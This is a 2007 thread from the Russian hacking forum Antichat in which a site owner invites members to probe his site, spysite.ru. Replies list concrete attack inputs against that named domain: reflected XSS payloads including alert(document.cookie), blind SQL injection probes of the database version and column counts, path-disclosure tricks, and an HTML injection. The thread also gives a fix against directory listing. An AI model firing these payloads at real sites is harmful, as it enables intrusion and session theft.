Форум АНТИЧАТ - Проверте пожалуйста

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)

- - Проверте пожалуйста (https://forum.antichat.xyz/showthread.php?t=45975)

vir7v

03.08.2007 19:06

Проверте пожалуйста

Просьба огромная проверить на взлом
www.spysite.ru

Я сам писал коды, но возможно чтото упустил

С Уважением.

freddi

03.08.2007 20:22

1) http://www.spysite.ru/forum/admin.php
без ограничения на кол-во попыток и картинки.
2) http://www.spysite.ru/forum/tools.php?event=find&find=ok'
раскрытие пути.

vir7v

03.08.2007 20:40

Цитата:

Сообщение от freddi

Принято

halkfild

03.08.2007 21:38

xss

http://www.spysite.ru/shop.php?shop=%C2%E8%E4%E5%EE%EA%E0%EC%E5%F0%FB%20 Panasonic&sort=%F7%B8%F0%ED%EE-%E1%E5%EB%FB%E5%22%3E%3Cscript%3Ealert()%3C/script%3E&type=%E1%E5%E7%20%EE%E1%FA%E5%EA%F2%E8%E 2%E0

это что за нах? :) :)

http://spysite.ru/library.php

в сорсах пишется структура базы :))

Код HTML:

есть результат посерьезнее но пока постить не буду :)

halkfild

04.08.2007 00:22

продолжение....

[САЙТ]

http://spysite.ru/contents/
http://spysite.ru/lib/
http://spysite.ru/setup/

http://spysite.ru/lib/review.php?article=1+and+(ascii(substring(VER
SION(),1,1))=51) :( версия 3 юнион не работает а получать данные с
таблицы особой охоты нет =)

http://spysite.ru/lib/review.php?article=1+order+by+7/* полей 7
http://www.spysite.ru/news.php?new=i7+order+by+5/* полей 5
ну и множество раскрытия путей =)
З.Ы. в низу страницы сбитые ссылки ну там "о нас" - ссылка на форум
и тд..

[ФОРУМ]
раскрытие путей
http://spysite.ru/forum/tools.php?event=givmepassword
http://spysite.ru/forum/tools.php?event=find&find=ok'

З.Ы. запрети ты листинг директорий.. =)

vir7v

04.08.2007 16:37

to halkfild
Спасибо. В понедельник буду править. Что касается кнопок внизу - знаю просто меняю дизайн. (но тож спасиб)

vir7v

06.08.2007 21:36

Что писать в .htacsess

Цитата:

Сообщение от halkfild

З.Ы. запрети ты листинг директорий.. =)

Ставлю .htacsess а сервак мне даже смотреть сайт не дает не только директории :mad:

Не подскажет кто нить че там писать то надо, чтобы все ок было

blackybr

07.08.2007 10:26

.htaccess

Код:

Options -Indexes

vir7v

07.08.2007 16:04

Цитата:

Сообщение от blackybr

.htaccess

Код:

Options -Indexes

Респект

Theraphy

29.10.2007 10:08

извените что сюда пишу,просто почему то темы я создаю,а они не появляются,вот проверьте мою игру плизз,она на движке от ИВ.но переделанная.

http://ladswar.com

BlackCats

29.10.2007 10:44

Цитата:

1)предмодерация
2)где баннер ачата?

Theraphy

07.11.2007 06:44

Цитата:

Сообщение от BlackCats

1)предмодерация
2)где баннер ачата?

Тот сайт,я нашёл дизайнера,пока что переделываем дизайн!!!

Вот если можешь проверь этот проект,тоже мой,банер поставить не могу.
но я записал ссылку и т.д в инфу к себе в игре,вот смотри статус АДМИНИСТРАТОР и там ссылки античата

http://twog.lathost.lv/inf.php?2836

приходи поставлю тоже админа,если не веришь, :)

WannY

11.11.2007 02:26

Spysite.Ru

/library.php?article=--><script>alert(document.cookie)</script>

/shop.php?shop=<br><h1><img%20src=http://anty611.jino-net.ru/antichat.ru.gif></h1><br"&sort=<br><h1>ANTICHAT.RU</h1><br"

bul.666

11.11.2007 07:06

http://www.spysite.ru/news.php?new=i12'

halkfild

11.11.2007 17:27

[pasкрытие путей]

http://spysite.ru/search.php?qwest[]=
http://spysite.ru/news.php?new[]=i3

http://spysite.ru/lib/kernel.php
http://spysite.ru/setup/forms.php
тут интересно, но ничего нормального выдавить не сложилось.. там инициализируется переменная может инклюд

/hsphere/local/home/spysite/spysite.ru/setup/forms.php

з.ы. в 4,5 постах этой темы описаны рабочие уязвимости
з.з.ы. зачем постить на проверку багов, если не исправлять то что найдено
з.з.з.ы. старайтесь смотреть, не писал ли кто-то эти уязвимости

Время: 06:58